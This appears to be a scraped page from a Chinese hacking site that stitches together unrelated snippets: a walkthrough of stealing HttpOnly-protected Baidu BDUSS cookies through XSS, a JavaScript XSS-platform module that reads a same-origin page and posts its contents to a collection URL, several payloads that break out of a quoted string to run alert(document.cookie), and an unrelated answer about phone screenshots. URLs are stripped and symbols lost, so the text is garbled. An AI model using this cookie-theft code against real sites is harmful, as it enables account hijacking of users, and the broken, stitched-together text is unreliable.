社会工程学

黑客技术入门,网站入侵,顶级黑客,黑客联盟,攻击网站

2022年07月17日 00:19:33

xss平台源码+截屏(xss漏洞源码)

本文目录一览:

如何通过 XSS 获取受 http-only さcookie

该测试页返回了完整的http头,其中也包括了完整的cookie。混贴吧圈的应该都知道BDUSS是最关键的字段,同时该字段是受http-only保护的,百度SRC之前也因此下调了XSS的评分标准。

02.jpg

这样,我们只要利用XSS平台的"指定页面源码读取"模块即可通过XSS获取用户的完整cookie。该模块代码如下:

code 区域

var u = ';id={projectId}';

var cr;

if (document.charset) {

cr = document.charset

} else if (document.characterSet) {

cr = document.characterSet

};

function createXmlHttp() {

if (window.XMLHttpRequest) {

xmlHttp = new XMLHttpRequest()

} else {

var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');

for (var n = 0; n MSXML.length; n++) {

try {

xmlHttp = new ActiveXObject(MSXML[n]);

break

} catch(e) {}

}

}

}

createXmlHttp();

xmlHttp.onreadystatechange = writeSource;

xmlHttp.open("GET", "", true);

xmlHttp.send(null);

function postSource(cc) {

createXmlHttp();

url = u;

cc = "mycode=" + cc;

xmlHttp.open("POST", url, true);

xmlHttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

xmlHttp.setRequestHeader("Content-length", cc.length);

xmlHttp.setRequestHeader("Connection", "close");

xmlHttp.send(cc)

}

function writeSource() {

if (xmlHttp.readyState == 4) {

var c = new postSource(xmlHttp.responseText)

}

}

由于是用xmlHttpRequest的形式读源码,且 的 Access-Control-Allow-Origin 为空,即默认不允许跨域,所以我们必须在同域下才能用xmlHttpRequest获取到完整的cookie。

我在 中有提到, 可以自由构造XSS。我们向该页面写入如下代码:

code 区域

titlewooyun.org/title

p超威蓝猫@wooyun.org/p

script src=;/script

XSS小问题

page= ;alert(document.cookie);

你没有闭合双引号,导致;alert(document.cookie); 成了变量的值了

右键网页源码中如下:var page=";alert(document.cookie);";

正确答案其实有很多种只要闭合两端的引号 中间的js代码可以有多种变化。

";\u0061lert(document.cookie);"

";alert(document.cookie);//

这是很基础的问题

慢慢学 多去wooyun知识库看看

如何使用xss平台盗取cookie

截取的是你的网站的 xss真正的原理是将代码插入到某个网页里面,当浏览器访问这个网页的时候,就会执行你写的代码。如果这个代码具有获取cookies的功能,即可获得当前页面的cookies 然而不同的网站cookies是不同的,也是不允许互相访问的。

高分求web漏洞扫描器(针对sql漏洞和xss漏洞)的程序源码,我愿用我全部的积分作为回报

这个红客防线好像有你想要的工具,看它们官网好像是要收费的,具体你去了解一下吧

sony erixsson lt181怎么截屏

按住休眠键(电源/开关/锁机键/音量下键)的同时按主屏幕(HOME)键,听见"咔嚓"一声,屏幕就成了一张完美照片。还有一个办法,安桌系统的下拉(从屏幕顶部往下拉)菜单里有一个截屏按钮,点击它也可以截屏。此外还有用第三方软件的,你可以到网上应用商店下载一款在你手机上最好用的截屏软件(如截屏大师、365截屏等),不过这要启动手机ROOT功能。

标签:xss平台源码+截屏 

作者:hacker , 分类:顶级黑客 , 浏览:112 , 评论:4

  • 评论列表:
  •  离鸢胭话
     发布于 2022-07-17 07:41:11  回复该评论
  • lert(document.cookie); 成了变量的值了右键网页源码中如下:var page=";alert(document.cookie);";正确答案其实有很多种只要闭合两端的引号 中间的js代码可以有多种变化。";\u0061lert(document.c
  •  青迟空名
     发布于 2022-07-17 09:13:46  回复该评论
  • 在同域下才能用xmlHttpRequest获取到完整的cookie。我在 中有提到, 可以自由构造XSS。我们向该页面写入如下代码:code 区域titlewooyun.org/titlep超威蓝猫@wooyun.org/pscript src=;/scr
  •  余安夙世
     发布于 2022-07-17 04:09:39  回复该评论
  • titlewooyun.org/titlep超威蓝猫@wooyun.org/pscript src=;/scriptXSS小问题page= ;alert(document.cookie);你没有闭合双引号,导致;ale
  •  痴者宠臣
     发布于 2022-07-17 07:31:47  回复该评论
  • new ActiveXObject(MSXML[n]); break } catch(e) {} } }}createXmlHttp()

发表评论:

Powered By

Copyright Your WebSite.Some Rights Reserved.